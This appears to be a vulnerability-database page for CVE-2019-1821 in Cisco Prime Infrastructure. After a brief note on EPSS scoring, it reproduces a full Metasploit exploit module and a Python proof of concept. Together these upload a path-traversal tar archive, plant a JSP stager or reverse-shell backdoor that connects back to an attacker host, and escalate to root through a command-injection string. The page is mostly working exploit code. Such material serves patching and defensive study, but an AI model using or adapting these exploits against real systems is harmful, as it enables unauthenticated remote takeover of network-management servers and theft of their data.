CVE-2019-1821 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => 'Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability', 'Description' => %q{ This module exploits a vulnerability found in Cisco Prime Infrastructure. The issue is that the TarArchive Java class the HA Health Monitor component uses does not check for any directory traversals while unpacking a Tar file, which can be abused by a remote user to leverage the UploadServlet class to upload a JSP payload to the Apache Tomcat's web apps directory, and gain arbitrary remote code execution. Note that authentication is not required to exploit this vulnerability. }, 'License' => MSF_LICENSE, 'Author' => [ 'Steven Seeley', # Original discovery, PoC 'sinn3r' # Metasploit module ], 'Platform' => 'linux', 'Arch' => ARCH_X86, 'Targets' => [ [ 'Cisco Prime Infrastructure 3.4.0.0', { } ] ], 'References' => [ ['CVE', '2019-1821'], ['URL', 'https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html'], ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-pi-rce'], ['URL', 'https://srcincite.io/advisories/src-2019-0034/'], ['URL', 'https://srcincite.io/pocs/src-2019-0034.py.txt'] ], 'DefaultOptions' => { 'RPORT' => 8082, 'SSL' => true, }, 'Notes' => { 'SideEffects' => [ IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ CRASH_SAFE ] }, 'Privileged' => false, 'DisclosureDate' => 'May 15 2019', 'DefaultTarget' => 0)) register_options( [ OptPort.new('WEBPORT', [true, 'Cisco Prime Infrastructure web interface', 443]), OptString.new('TARGETURI', [true, 'The route for Cisco Prime Infrastructure web interface', '/']) ]) end class CPITarArchive attr_reader :data attr_reader :jsp_name attr_reader :tar_name attr_reader :stager attr_reader :length def initialize(name, stager) @jsp_name = "#{name}.jsp" @tar_name = "#{name}.tar" @stager = stager @data = make @length = data.length end def make data = '' path = "../../opt/CSCOlumos/tomcat/webapps/ROOT/#{jsp_name}" tar = StringIO.new Rex::Tar::Writer.new(tar) do |t| t.add_file(path, 0644) do |f| f.write(stager) end end tar.seek(0) data = tar.read tar.close data end end def check res = send_request_cgi({ 'rport' => datastore['WEBPORT'], 'SSL' => true, 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'webacs', 'pages', 'common', 'login.jsp') }) unless res vprint_error('No response from the server') return CheckCode::Unknown end if res.code == 200 && res.headers['Server'] && res.headers['Server'] == 'Prime' return CheckCode::Detected end CheckCode::Safe end def get_jsp_stager(out_file, bin_data) # For some reason, some of the bytes tend to get lost at the end. # Not really sure why, but some extra bytes are added to ensure the integrity # of the code. This file will get deleted during cleanup anyway. %Q|<%@ page import="java.io.*" %> <% String data = "#{Rex::Text.to_hex(bin_data, '')}"; FileOutputStream outputstream = new FileOutputStream("#{out_file}"); int numbytes = data.length(); byte[] bytes = new byte[numbytes/2]; for (int counter = 0; counter < numbytes; counter += 2) { char char1 = (char) data.charAt(counter); char char2 = (char) data.charAt(counter + 1); int comb = Character.digit(char1, 16) & 0xff; comb <<= 4; comb += Character.digit(char2, 16) & 0xff; bytes[counter/2] = (byte)comb; } outputstream.write(bytes); outputstream.close(); try { Runtime.getRuntime().exec("chmod +x #{out_file}"); Runtime.getRuntime().exec("#{out_file}"); } catch (IOException exp) {} %>#{Rex::Text.rand_text_alpha(30)}| end def make_tar elf_name = "/tmp/#{Rex::Text.rand_text_alpha(10)}.bin" register_file_for_cleanup(elf_name) elf = generate_payload_exe(code: payload.encoded) jsp_stager = get_jsp_stager(elf_name, elf) tar_name = Rex::Text.rand_text_alpha(10) register_file_for_cleanup("apache-tomcat-8.5.16/webapps/ROOT/#{tar_name}.jsp") CPITarArchive.new(tar_name, jsp_stager) end def execute_payload(tar) # Once executed, we are at: # /opt/CSCOlumos send_request_cgi({ 'rport' => datastore['WEBPORT'], 'SSL' => true, 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, tar.jsp_name) }) end def upload_tar(tar) post_data = Rex::MIME::Message.new post_data.add_part(tar.data, nil, nil, "form-data; name=\"files\"; filename=\"#{tar.tar_name}\"") # The file gets uploaded to this path on the server: # /opt/CSCOlumos/apache-tomcat-8.5.16/webapps/ROOT/tar_name.jsp res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'servlet', 'UploadServlet'), 'data' => post_data.to_s, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'headers' => { 'Destination-Dir' => 'tftpRoot', 'Compressed-Archive' => 'false', 'Primary-IP' => '127.0.0.1', 'Filecount' => '1', 'Filename' => tar.tar_name, 'FileSize' => tar.length } }) (res && res.code == 200) end def exploit tar = make_tar print_status("Uploading tar file (#{tar.length} bytes)") if upload_tar(tar) print_status('Executing JSP stager...') execute_payload(tar) else print_status("Failed to upload #{tar.tar_name}") end end end

#!/usr/bin/python """ Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability Steven Seeley (mr_me) of Source Incite - 2019 SRC: SRC-2019-0034 CVE: CVE-2019-1821 Example: ======== saturn:~ mr_me$ ./poc.py (+) usage: ./poc.py <target> <connectback:port> (+) eg: ./poc.py 192.168.100.123 192.168.100.2:4444 saturn:~ mr_me$ ./poc.py 192.168.100.123 192.168.100.2:4444 (+) planted backdoor! (+) starting handler on port 4444 (+) connection from 192.168.100.123 (+) pop thy shell! python -c 'import pty; pty.spawn("/bin/bash")' [prime@piconsole CSCOlumos]$ /opt/CSCOlumos/bin/runrshell '" && /bin/sh #' /opt/CSCOlumos/bin/runrshell '" && /bin/sh #' sh-4.1# /usr/bin/id /usr/bin/id uid=0(root) gid=0(root) groups=0(root),110(gadmin),201(xmpdba) context=system_u:system_r:unconfined_java_t:s0 sh-4.1# exit exit exit [prime@piconsole CSCOlumos]$ exit exit exit """ import sys import socket import requests import tarfile import telnetlib from threading import Thread from cStringIO import StringIO from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def _build_tar(ls, lp): """ build the tar archive without touching disk """ f = StringIO() b = _get_jsp(ls, lp) t = tarfile.TarInfo("../../opt/CSCOlumos/tomcat/webapps/ROOT/si.jsp") t.size = len(b) with tarfile.open(fileobj=f, mode="w") as tar: tar.addfile(t, StringIO(b)) return f.getvalue() def _get_jsp(ls, lp): jsp = """<%@page import="java.lang.*"%> <%@page import="java.util.*"%> <%@page import="java.io.*"%> <%@page import="java.net.*"%> <% class StreamConnector extends Thread { InputStream sv; OutputStream tp; StreamConnector( InputStream sv, OutputStream tp ) { this.sv = sv; this.tp = tp; } public void run() { BufferedReader za = null; BufferedWriter hjr = null; try { za = new BufferedReader( new InputStreamReader( this.sv ) ); hjr = new BufferedWriter( new OutputStreamWriter( this.tp ) ); char buffer[] = new char[8192]; int length; while( ( length = za.read( buffer, 0, buffer.length ) ) > 0 ) { hjr.write( buffer, 0, length ); hjr.flush(); } } catch( Exception e ){} try { if( za != null ) za.close(); if( hjr != null ) hjr.close(); } catch( Exception e ){} } } try { String ShellPath = new String("/bin/sh"); Socket socket = new Socket("__IP__", __PORT__); Process process = Runtime.getRuntime().exec( ShellPath ); ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start(); ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start(); } catch( Exception e ) {} %>""" return jsp.replace("__IP__", ls).replace("__PORT__", str(lp)) def handler(lp): """ This is the client handler, to catch the connectback """ print "(+) starting handler on port %d" % lp t = telnetlib.Telnet() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("0.0.0.0", lp)) s.listen(1) conn, addr = s.accept() print "(+) connection from %s" % addr[0] t.sock = conn print "(+) pop thy shell!" t.interact() def exec_code(t, lp): """ This function threads the client handler and sends off the attacking payload """ handlerthr = Thread(target=handler, args=(lp,)) handlerthr.start() r = requests.get("https://%s/si.jsp" % t, verify=False) def we_can_upload(t, ls, lp): """ This is where we take advantage of the vulnerability """ td = _build_tar(ls, lp) bd = {'files': ('si.tar', td)} h = { 'Destination-Dir': 'tftpRoot', 'Compressed-Archive': "false", 'Primary-IP' : '127.0.0.1', 'Filecount' : "1", 'Filename': "si.tar", 'Filesize' : str(len(td)), } r = requests.post("https://%s:8082/servlet/UploadServlet" % t, headers=h, files=bd, verify=False) if r.status_code == 200: return True return False def main(): if len(sys.argv) != 3: print "(+) usage: %s <target> <connectback:port>" % sys.argv[0] print "(+) eg: %s 192.168.100.123 192.168.100.2:4444" % sys.argv[0] sys.exit(-1) t = sys.argv[1] cb = sys.argv[2] if not ":" in cb: print "(+) using default connectback port 4444" ls = cb lp = 4444 else: if not cb.split(":")[1].isdigit(): print "(-) %s is not a port number!" % cb.split(":")[1] sys.exit(-1) ls = cb.split(":")[0] lp = int(cb.split(":")[1]) if we_can_upload(t, ls, lp): print "(+) planted backdoor!" exec_code(t, lp) if __name__ == '__main__': main()